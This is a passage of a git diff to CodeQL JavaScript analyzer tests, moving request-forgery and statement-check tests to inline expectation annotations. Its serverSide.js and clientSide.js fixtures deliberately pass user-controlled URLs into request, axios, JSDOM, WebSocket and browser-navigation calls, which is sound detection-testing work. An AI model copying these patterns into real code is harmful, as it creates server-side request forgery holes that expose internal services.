clientSide.js:11:11:11:53 | query | clientSide.js:12:42:12:46 | query | provenance | | | clientSide.js:11:19:11:40 | window. ... .search | clientSide.js:11:19:11:53 | window. ... ring(1) | provenance | | @@ -29,8 +34,3 @@ nodes | clientSide.js:21:13:21:53 | 'https: ... + '/id' | semmle.label | 'https: ... + '/id' | | clientSide.js:21:42:21:45 | name | semmle.label | name | subpaths -#select -| clientSide.js:12:5:12:55 | request ... '/id') | clientSide.js:11:19:11:40 | window. ... .search | clientSide.js:12:13:12:54 | 'https: ... + '/id' | The $@ of this request depends on a $@. | clientSide.js:12:13:12:54 | 'https: ... + '/id' | URL | clientSide.js:11:19:11:40 | window. ... .search | user-provided value | -| clientSide.js:14:5:14:64 | request ... search) | clientSide.js:14:42:14:63 | window. ... .search | clientSide.js:14:13:14:63 | 'https: ... .search | The $@ of this request depends on a $@. | clientSide.js:14:13:14:63 | 'https: ... .search | URL | clientSide.js:14:42:14:63 | window. ... .search | user-provided value | -| clientSide.js:17:5:17:58 | request ... '/id') | clientSide.js:16:22:16:41 | window.location.hash | clientSide.js:17:13:17:57 | 'https: ... + '/id' | The $@ of this request depends on a $@. | clientSide.js:17:13:17:57 | 'https: ... + '/id' | URL | clientSide.js:16:22:16:41 | window.location.hash | user-provided value | -| clientSide.js:21:5:21:54 | request ... '/id') | clientSide.js:20:18:20:28 | window.name | clientSide.js:21:13:21:53 | 'https: ... + '/id' | The $@ of this request depends on a $@. | clientSide.js:21:13:21:53 | 'https: ... + '/id' | URL | clientSide.js:20:18:20:28 | window.name | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.qlref b/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.qlref index 1557850e85d9..9f67a0ba2a0b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.qlref @@ -1 +1,2 @@ -Security/CWE-918/ClientSideRequestForgery.ql +query: Security/CWE-918/ClientSideRequestForgery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.expected index edeab8f1d94f..b62008204c69 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.expected +++ b/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.expected @@ -1,3 +1,28 @@ +#select +| serverSide.js:18:5:18:20 | request(tainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:18:13:18:19 | tainted | The $@ of this request depends on a $@. | serverSide.js:18:13:18:19 | tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:20:5:20:24 | request.get(tainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:20:17:20:23 | tainted | The $@ of this request depends on a $@. | serverSide.js:20:17:20:23 | tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:24:5:24:20 | request(options) | serverSide.js:14:29:14:35 | req.url | serverSide.js:23:19:23:25 | tainted | The $@ of this request depends on a $@. | serverSide.js:23:19:23:25 | tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:26:5:26:32 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:26:13:26:31 | "http://" + tainted | The $@ of this request depends on a $@. | serverSide.js:26:13:26:31 | "http://" + tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:28:5:28:43 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:28:13:28:42 | "http:/ ... tainted | The $@ of this request depends on a $@. | serverSide.js:28:13:28:42 | "http:/ ... tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:30:5:30:44 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:30:13:30:43 | "http:/ ... tainted | The $@ of this request depends on a $@. | serverSide.js:30:13:30:43 | "http:/ ... tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:34:5:34:42 | http.ge ... inted}) | serverSide.js:14:29:14:35 | req.url | serverSide.js:34:34:34:40 | tainted | The $@ of this request depends on a $@. | serverSide.js:34:34:34:40 | tainted | host | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:36:5:36:32 | XhrIo.s ... inted)) | serverSide.js:14:29:14:35 | req.url | serverSide.js:36:16:36:31 | new Uri(tainted) | The $@ of this request depends on a $@. | serverSide.js:36:16:36:31 | new Uri(tainted) | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:37:5:37:38 | new Xhr ... inted)) | serverSide.js:14:29:14:35 | req.url | serverSide.js:37:22:37:37 | new Uri(tainted) | The $@ of this request depends on a $@. | serverSide.js:37:22:37:37 | new Uri(tainted) | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:41:5:41:52 | request ... nted}`) | serverSide.js:14:29:14:35 | req.url | serverSide.js:41:13:41:51 | `http:/ ... inted}` | The $@ of this request depends on a $@. | serverSide.js:41:13:41:51 | `http:/ ... inted}` | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:43:5:43:55 | request ... nted}`) | serverSide.js:14:29:14:35 | req.url | serverSide.js:43:13:43:54 | `http:/ ... inted}` | The $@ of this request depends on a $@. | serverSide.js:43:13:43:54 | `http:/ ... inted}` | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:45:5:45:57 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:45:13:45:56 | 'http:/ ... tainted | The $@ of this request depends on a $@. | serverSide.js:45:13:45:56 | 'http:/ ... tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:61:2:61:37 | client. ... inted}) | serverSide.js:58:29:58:35 | req.url | serverSide.js:61:29:61:35 | tainted | The $@ of this request depends on a $@. | serverSide.js:61:29:61:35 | tainted | URL | serverSide.js:58:29:58:35 | req.url | user-provided value | +| serverSide.js:64:3:64:38 | client. ... inted}) | serverSide.js:58:29:58:35 | req.url | serverSide.js:64:30:64:36 | tainted | The $@ of this request depends on a $@. | serverSide.js:64:30:64:36 | tainted | URL | serverSide.js:58:29:58:35 | req.url | user-provided value | +| serverSide.js:68:3:68:38 | client. ... inted}) | serverSide.js:58:29:58:35 | req.url | serverSide.js:68:30:68:36 | tainted | The $@ of this request depends on a $@. | serverSide.js:68:30:68:36 | tainted | URL | serverSide.js:58:29:58:35 | req.url | user-provided value | +| serverSide.js:76:5:76:26 | JSDOM.f ... ainted) | serverSide.js:74:29:74:35 | req.url | serverSide.js:76:19:76:25 | tainted | The $@ of this request depends on a $@. | serverSide.js:76:19:76:25 | tainted | URL | serverSide.js:74:29:74:35 | req.url | user-provided value | +| serverSide.js:84:5:84:25 | JSDOM.f ... param1) | serverSide.js:83:38:83:43 | param1 | serverSide.js:84:19:84:24 | param1 | The $@ of this request depends on a $@. | serverSide.js:84:19:84:24 | param1 | URL | serverSide.js:83:38:83:43 | param1 | user-provided value | +| serverSide.js:90:5:90:33 | JSDOM.f ... ms.foo) | serverSide.js:90:19:90:28 | ctx.params | serverSide.js:90:19:90:32 | ctx.params.foo | The $@ of this request depends on a $@. | serverSide.js:90:19:90:32 | ctx.params.foo | URL | serverSide.js:90:19:90:28 | ctx.params | user-provided value | +| serverSide.js:92:5:92:33 | JSDOM.f ... ms.foo) | serverSide.js:92:19:92:28 | ctx.params | serverSide.js:92:19:92:32 | ctx.params.foo | The $@ of this request depends on a $@. | serverSide.js:92:19:92:32 | ctx.params.foo | URL | serverSide.js:92:19:92:28 | ctx.params | user-provided value | +| serverSide.js:100:5:100:26 | new Web ... ainted) | serverSide.js:98:29:98:35 | req.url | serverSide.js:100:19:100:25 | tainted | The $@ of this request depends on a $@. | serverSide.js:100:19:100:25 | tainted | URL | serverSide.js:98:29:98:35 | req.url | user-provided value | +| serverSide.js:109:20:109:30 | new ws(url) | serverSide.js:108:17:108:27 | request.url | serverSide.js:109:27:109:29 | url | The $@ of this request depends on a $@. | serverSide.js:109:27:109:29 | url | URL | serverSide.js:108:17:108:27 | request.url | user-provided value | +| serverSide.js:117:20:117:30 | new ws(url) | serverSide.js:115:25:115:35 | request.url | serverSide.js:117:27:117:29 | url | The $@ of this request depends on a $@. | serverSide.js:117:27:117:29 | url | URL | serverSide.js:115:25:115:35 | request.url | user-provided value | +| serverSide.js:125:5:128:6 | axios({ ... \\n }) | serverSide.js:123:29:123:35 | req.url | serverSide.js:127:14:127:20 | tainted | The $@ of this request depends on a $@. | serverSide.js:127:14:127:20 | tainted | URL | serverSide.js:123:29:123:35 | req.url | user-provided value | +| serverSide.js:131:5:131:20 | axios.get(myUrl) | serverSide.js:123:29:123:35 | req.url | serverSide.js:131:15:131:19 | myUrl | The $@ of this request depends on a $@. | serverSide.js:131:15:131:19 | myUrl | URL | serverSide.js:123:29:123:35 | req.url | user-provided value | edges | serverSide.js:14:9:14:52 | tainted | serverSide.js:18:13:18:19 | tainted | provenance | | | serverSide.js:14:9:14:52 | tainted | serverSide.js:20:17:20:23 | tainted | provenance | | @@ -107,28 +132,3 @@ nodes | serverSide.js:130:37:130:43 | tainted | semmle.label | tainted | | serverSide.js:131:15:131:19 | myUrl | semmle.label | myUrl | subpaths -#select -| serverSide.js:18:5:18:20 | request(tainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:18:13:18:19 | tainted | The $@ of this request depends on a $@. | serverSide.js:18:13:18:19 | tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:20:5:20:24 | request.get(tainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:20:17:20:23 | tainted | The $@ of this request depends on a $@. | serverSide.js:20:17:20:23 | tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:24:5:24:20 | request(options) | serverSide.js:14:29:14:35 | req.url | serverSide.js:23:19:23:25 | tainted | The $@ of this request depends on a $@. | serverSide.js:23:19:23:25 | tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:26:5:26:32 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:26:13:26:31 | "http://" + tainted | The $@ of this request depends on a $@. | serverSide.js:26:13:26:31 | "http://" + tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:28:5:28:43 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:28:13:28:42 | "http:/ ... tainted | The $@ of this request depends on a $@. | serverSide.js:28:13:28:42 | "http:/ ... tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:30:5:30:44 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:30:13:30:43 | "http:/ ... tainted | The $@ of this request depends on a $@. | serverSide.js:30:13:30:43 | "http:/ ... tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:34:5:34:42 | http.ge ... inted}) | serverSide.js:14:29:14:35 | req.url | serverSide.js:34:34:34:40 | tainted | The $@ of this request depends on a $@. | serverSide.js:34:34:34:40 | tainted | host | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:36:5:36:32 | XhrIo.s ... inted)) | serverSide.js:14:29:14:35 | req.url | serverSide.js:36:16:36:31 | new Uri(tainted) | The $@ of this request depends on a $@. | serverSide.js:36:16:36:31 | new Uri(tainted) | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:37:5:37:38 | new Xhr ... inted)) | serverSide.js:14:29:14:35 | req.url | serverSide.js:37:22:37:37 | new Uri(tainted) | The $@ of this request depends on a $@. | serverSide.js:37:22:37:37 | new Uri(tainted) | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:41:5:41:52 | request ... nted}`) | serverSide.js:14:29:14:35 | req.url | serverSide.js:41:13:41:51 | `http:/ ... inted}` | The $@ of this request depends on a $@. | serverSide.js:41:13:41:51 | `http:/ ... inted}` | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:43:5:43:55 | request ... nted}`) | serverSide.js:14:29:14:35 | req.url | serverSide.js:43:13:43:54 | `http:/ ... inted}` | The $@ of this request depends on a $@. | serverSide.js:43:13:43:54 | `http:/ ... inted}` | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:45:5:45:57 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:45:13:45:56 | 'http:/ ... tainted | The $@ of this request depends on a $@. | serverSide.js:45:13:45:56 | 'http:/ ... tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:61:2:61:37 | client. ... inted}) | serverSide.js:58:29:58:35 | req.url | serverSide.js:61:29:61:35 | tainted | The $@ of this request depends on a $@. | serverSide.js:61:29:61:35 | tainted | URL | serverSide.js:58:29:58:35 | req.url | user-provided value | -| serverSide.js:64:3:64:38 | client. ... inted}) | serverSide.js:58:29:58:35 | req.url | serverSide.js:64:30:64:36 | tainted | The $@ of this request depends on a $@. | serverSide.js:64:30:64:36 | tainted | URL | serverSide.js:58:29:58:35 | req.url | user-provided value | -| serverSide.js:68:3:68:38 | client. ... inted}) | serverSide.js:58:29:58:35 | req.url | serverSide.js:68:30:68:36 | tainted | The $@ of this request depends on a $@. | serverSide.js:68:30:68:36 | tainted | URL | serverSide.js:58:29:58:35 | req.url | user-provided value | -| serverSide.js:76:5:76:26 | JSDOM.f ... ainted) | serverSide.js:74:29:74:35 | req.url | serverSide.js:76:19:76:25 | tainted | The $@ of this request depends on a $@. | serverSide.js:76:19:76:25 | tainted | URL | serverSide.js:74:29:74:35 | req.url | user-provided value | -| serverSide.js:84:5:84:25 | JSDOM.f ... param1) | serverSide.js:83:38:83:43 | param1 | serverSide.js:84:19:84:24 | param1 | The $@ of this request depends on a $@. | serverSide.js:84:19:84:24 | param1 | URL | serverSide.js:83:38:83:43 | param1 | user-provided value | -| serverSide.js:90:5:90:33 | JSDOM.f ... ms.foo) | serverSide.js:90:19:90:28 | ctx.params | serverSide.js:90:19:90:32 | ctx.params.foo | The $@ of this request depends on a $@. | serverSide.js:90:19:90:32 | ctx.params.foo | URL | serverSide.js:90:19:90:28 | ctx.params | user-provided value | -| serverSide.js:92:5:92:33 | JSDOM.f ... ms.foo) | serverSide.js:92:19:92:28 | ctx.params | serverSide.js:92:19:92:32 | ctx.params.foo | The $@ of this request depends on a $@. | serverSide.js:92:19:92:32 | ctx.params.foo | URL | serverSide.js:92:19:92:28 | ctx.params | user-provided value | -| serverSide.js:100:5:100:26 | new Web ... ainted) | serverSide.js:98:29:98:35 | req.url | serverSide.js:100:19:100:25 | tainted | The $@ of this request depends on a $@. | serverSide.js:100:19:100:25 | tainted | URL | serverSide.js:98:29:98:35 | req.url | user-provided value | -| serverSide.js:109:20:109:30 | new ws(url) | serverSide.js:108:17:108:27 | request.url | serverSide.js:109:27:109:29 | url | The $@ of this request depends on a $@. | serverSide.js:109:27:109:29 | url | URL | serverSide.js:108:17:108:27 | request.url | user-provided value | -| serverSide.js:117:20:117:30 | new ws(url) | serverSide.js:115:25:115:35 | request.url | serverSide.js:117:27:117:29 | url | The $@ of this request depends on a $@. | serverSide.js:117:27:117:29 | url | URL | serverSide.js:115:25:115:35 | request.url | user-provided value | -| serverSide.js:125:5:128:6 | axios({ ... \\n }) | serverSide.js:123:29:123:35 | req.url | serverSide.js:127:14:127:20 | tainted | The $@ of this request depends on a $@. | serverSide.js:127:14:127:20 | tainted | URL | serverSide.js:123:29:123:35 | req.url | user-provided value | -| serverSide.js:131:5:131:20 | axios.get(myUrl) | serverSide.js:123:29:123:35 | req.url | serverSide.js:131:15:131:19 | myUrl | The $@ of this request depends on a $@. | serverSide.js:131:15:131:19 | myUrl | URL | serverSide.js:123:29:123:35 | req.url | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref index fcb4e41daf88..28fbe9364a97 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref @@ -1 +1,2 @@ -Security/CWE-918/RequestForgery.ql +query: Security/CWE-918/RequestForgery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js index c55270377ede..d546d809a9dd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js @@ -8,18 +8,18 @@ export function MyComponent() { request('https://example.com/api/' + params.foo + '/id'); // OK - cannot manipulate path using `../` request(params.foo); // Possibly problematic, but not currently flagged. - const query = window.location.search.substring(1); - request('https://example.com/api/' + query + '/id'); // NOT OK - request('https://example.com/api?q=' + query); // OK - request('https://example.com/api/' + window.location.search); // likely OK - but currently flagged anyway + const query = window.location.search.substring(1); // $ Source[js/client-side-request-forgery] + request('https://example.com/api/' + query + '/id'); // $ Alert[js/client-side-request-forgery] Sink[js/client-side-request-forgery] + request('https://example.com/api?q=' + query); + request('https://example.com/api/' + window.location.search); // $ Alert[js/client-side-request-forgery] Sink[js/client-side-request-forgery] - likely OK - but currently flagged anyway - const fragment = window.location.hash.substring(1); - request('https://example.com/api/' + fragment + '/id'); // NOT OK - request('https://example.com/api?q=' + fragment); // OK + const fragment = window.location.hash.substring(1); // $ Source[js/client-side-request-forgery] + request('https://example.com/api/' + fragment + '/id'); // $ Alert[js/client-side-request-forgery] Sink[js/client-side-request-forgery] + request('https://example.com/api?q=' + fragment); - const name = window.name; - request('https://example.com/api/' + name + '/id'); // NOT OK - request('https://example.com/api?q=' + name); // OK + const name = window.name; // $ Source[js/client-side-request-forgery] + request('https://example.com/api/' + name + '/id'); // $ Alert[js/client-side-request-forgery] Sink[js/client-side-request-forgery] + request('https://example.com/api?q=' + name); - request(window.location.href + '?q=123'); // OK + request(window.location.href + '?q=123'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js index 7b4c792bb366..fce762084455 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js @@ -11,42 +11,42 @@ let XhrIo = goog.require('goog.net.XhrIo'); let Uri = goog.require('goog.Uri'); var server = http.createServer(function(req, res) { - var tainted = url.parse(req.url, true).query.url; + var tainted = url.parse(req.url, true).query.url; // $ Source[js/request-forgery] - request("example.com"); // OK + request("example.com"); - request(tainted); // NOT OK + request(tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request.get(tainted); // NOT OK + request.get(tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] var options = {}; - options.url = tainted; // NOT OK - request(options); + options.url = tainted; // $ Sink[js/request-forgery] + request(options); // $ Alert[js/request-forgery] - request("http://" + tainted); // NOT OK + request("http://" + tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request("http://example.com" + tainted); // NOT OK + request("http://example.com" + tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request("http://example.com/" + tainted); // NOT OK + request("http://example.com/" + tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request("http://example.com/?" + tainted); // OK + request("http://example.com/?" + tainted); - http.get(relativeUrl, {host: tainted}); // NOT OK + http.get(relativeUrl, {host: tainted}); // $ Alert[js/request-forgery] Sink[js/request-forgery] - XhrIo.send(new Uri(tainted)); // NOT OK - new XhrIo().send(new Uri(tainted)); // NOT OK + XhrIo.send(new Uri(tainted)); // $ Alert[js/request-forgery] Sink[js/request-forgery] + new XhrIo().send(new Uri(tainted)); // $ Alert[js/request-forgery] Sink[js/request-forgery] let base = require('./config').base; - request(`http://example.com/${base}/${tainted}`); // NOT OK + request(`http://example.com/${base}/${tainted}`); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request(`http://example.com/${base}/v1/${tainted}`); // NOT OK + request(`http://example.com/${base}/v1/${tainted}`); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request('http://example.com/' + base + '/' + tainted); // NOT OK + request('http://example.com/' + base + '/' + tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request('http://example.com/' + base + ('/' + tainted)); // NOT OK - but not flagged [INCONSISTENCY] + request('http://example.com/' + base + ('/' + tainted)); // $ MISSING: Alert - request(`http://example.com/?${base}/${tainted}`); // OK + request(`http://example.com/?${base}/${tainted}`); request(`http://example.com/${base}${tainted}`); // OK - assumed safe @@ -55,49 +55,49 @@ var server = http.createServer(function(req, res) { var CDP = require("chrome-remote-interface"); var server = http.createServer(async function(req, res) { - var tainted = url.parse(req.url, true).query.url; + var tainted = url.parse(req.url, true).query.url; // $ Source[js/request-forgery] var client = await CDP(options); - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] Sink[js/request-forgery] CDP(options).catch((ignored) => {}).then((client) => { - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] Sink[js/request-forgery] }) CDP(options, (client) => { - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] Sink[js/request-forgery] }); }) import {JSDOM} from "jsdom"; var server = http.createServer(async function(req, res) { - var tainted = url.parse(req.url, true).query.url; + var tainted = url.parse(req.url, true).query.url; // $ Source[js/request-forgery] - JSDOM.fromURL(tainted); // NOT OK + JSDOM.fromURL(tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] }); var route = require('koa-route'); var Koa = require('koa'); var app = new Koa(); -app.use(route.get('/pets', (context, param1, param2, param3) => { - JSDOM.fromURL(param1); // NOT OK +app.use(route.get('/pets', (context, param1, param2, param3) => { // $ Source[js/request-forgery] + JSDOM.fromURL(param1); // $ Alert[js/request-forgery] Sink[js/request-forgery] })); const router = require('koa-router')(); const app = new Koa(); router.get('/', async (ctx, next) => { - JSDOM.fromURL(ctx.params.foo); // NOT OK + JSDOM.fromURL(ctx.params.foo); // $ Alert[js/request-forgery] Sink[js/request-forgery] }).post('/', async (ctx, next) => { - JSDOM.fromURL(ctx.params.foo); // NOT OK + JSDOM.fromURL(ctx.params.foo); // $ Alert[js/request-forgery] Sink[js/request-forgery] }); app.use(router.routes()); import {JSDOM} from "jsdom"; var server = http.createServer(async function(req, res) { - var tainted = url.parse(req.url, true).query.url; + var tainted = url.parse(req.url, true).query.url; // $ Source[js/request-forgery] - new WebSocket(tainted); // NOT OK + new WebSocket(tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] }); @@ -105,31 +105,31 @@ import * as ws from 'ws'; new ws.Server({ port: 8080 }).on('connection', function(socket, request) { socket.on('message', function(message) { - const url = request.url; - const socket = new ws(url); + const url = request.url; // $ Source[js/request-forgery] + const socket = new ws(url); // $ Alert[js/request-forgery] Sink[js/request-forgery] }); }); new ws.Server({ port: 8080 }).on('connection', function (socket, request) { socket.on('message', function (message) { - const url = new URL(request.url, base); + const url = new URL(request.url, base); // $ Source[js/request-forgery] const target = new URL(url.pathname, base); - const socket = new ws(url); + const socket = new ws(url); // $ Alert[js/request-forgery] Sink[js/request-forgery] }); }); var server2 = http.createServer(function(req, res) { - var tainted = url.parse(req.url, true).query.url; + var tainted = url.parse(req.url, true).query.url; // $ Source[js/request-forgery] axios({ method: 'get', - url: tainted // NOT OK - }) + url: tainted // $ Sink[js/request-forgery] + }) // $ Alert[js/request-forgery] var myUrl = `${something}/bla/${tainted}`; - axios.get(myUrl); // NOT OK + axios.get(myUrl); // $ Alert[js/request-forgery] Sink[js/request-forgery] var myEncodedUrl = `${something}/bla/${encodeURIComponent(tainted)}`; - axios.get(myEncodedUrl); // OK + axios.get(myEncodedUrl); }) \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/DanglingElse/DanglingElse.qlref b/javascript/ql/test/query-tests/Statements/DanglingElse/DanglingElse.qlref index 4bccc4a7469e..69b8d7561a2b 100644 --- a/javascript/ql/test/query-tests/Statements/DanglingElse/DanglingElse.qlref +++ b/javascript/ql/test/query-tests/Statements/DanglingElse/DanglingElse.qlref @@ -1 +1,2 @@ -Statements/DanglingElse.ql \ No newline at end of file +query: Statements/DanglingElse.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js b/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js index ea1966d190b7..5ff77f4e77bc 100644 --- a/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js +++ b/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js @@ -2,7 +2,7 @@ function bad1() { if (cond1()) if (cond2()) return 23; - else + else // $ Alert return 42; } @@ -18,7 +18,7 @@ function bad2() { if (cond1()) { if (cond2()) { return 23; - } else { + } else { // $ Alert return 42; }} } @@ -37,7 +37,7 @@ function bad3() { else if (cond2()) if (cond2()) return 42; - else + else // $ Alert return 42; } diff --git a/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.expected b/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.expected index 887e249db55a..60c733458315 100644 --- a/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.expected +++ b/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.expected @@ -1,2 +1,2 @@ -| tst.js:2:1:2:9 | while(c ... reak;\\n} | This loop executes at most once. | -| tst.js:13:3:13:29 | for (; ... et;\\n } | This loop executes at most once. | +| tst.js:1:1:1:20 | while(c ... reak;\\n} | This loop executes at most once. | +| tst.js:11:3:11:40 | for (; ... et;\\n } | This loop executes at most once. | diff --git a/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.qlref b/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.qlref index f30b9bb5fd7d..18a02cd30a12 100644 --- a/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.qlref +++ b/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.qlref @@ -1 +1,2 @@ -Statements/EphemeralLoop.ql +query: Statements/EphemeralLoop.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js b/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js index 1b66865ea21c..c3dc1f230889 100644 --- a/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js +++ b/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js @@ -1,5 +1,4 @@ -// NOT OK -while(c){ +while(c){ // $ Alert switch(c){ case "/": break; @@ -8,23 +7,22 @@ while(c){ break; } -// NOT OK function f() { - for (; k < numprecincts;) { + for (; k < numprecincts;) { // $ Alert var packet = createPacket(resolution, k, l); k++; return packet; } } -// OK + var oHasProps = false; for (var p in o) { oHasProps = true; break; } -// OK + while(c){ if (c === '"') break; diff --git a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/IgnoreArrayResult.qlref b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/IgnoreArrayResult.qlref index 2cbc7e722a5c..46598aaab68f 100644 --- a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/IgnoreArrayResult.qlref +++ b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/IgnoreArrayResult.qlref @@ -1 +1,2 @@ -Statements/IgnoreArrayResult.ql \ No newline at end of file +query: Statements/IgnoreArrayResult.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js index 47efe8c1cb6c..adbd85cf6157 100644 --- a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js +++ b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js @@ -1,8 +1,8 @@ var arr = [1,2,3]; -arr.concat([1,2,3]); // NOT OK! +arr.concat([1,2,3]); // $ Alert -arr.concat(arr); // NOT OK! +arr.concat(arr); // $ Alert console.log(arr.concat([1,2,3])); diff --git a/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.expected b/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.expected index 13c308ac7010..6db0835ca621 100644 --- a/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.expected +++ b/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.expected @@ -1,3 +1,3 @@ -| tst.js:3:2:3:11 | if (foo ... n true; | $@ may implicitly return 'undefined' here, while $@ an explicit value is returned. | tst.js:2:1:5:1 | functio ... true;\\n} | Function f | tst.js:4:3:4:14 | return true; | elsewhere | -| tst.js:101:2:101:11 | if (foo ... n true; | $@ may implicitly return 'undefined' here, while $@ an explicit value is returned. | tst.js:100:9:103:1 | functio ... true;\\n} | Function u | tst.js:102:3:102:14 | return true; | elsewhere | -| tst.js:107:2:107:7 | if (b)\\n\\t\\treturn 1; | $@ may implicitly return 'undefined' here, while $@ an explicit value is returned. | tst.js:106:1:109:1 | functio ... rn 1;\\n} | Function v | tst.js:108:3:108:11 | return 1; | elsewhere | +| tst.js:2:2:2:22 | if (foo ... n true; | $@ may implicitly return 'undefined' here, while $@ an explicit value is returned. | tst.js:1:1:4:1 | functio ... true;\\n} | Function f | tst.js:3:3:3:14 | return true; | elsewhere | +| tst.js:99:2:99:22 | if (foo ... n true; | $@ may 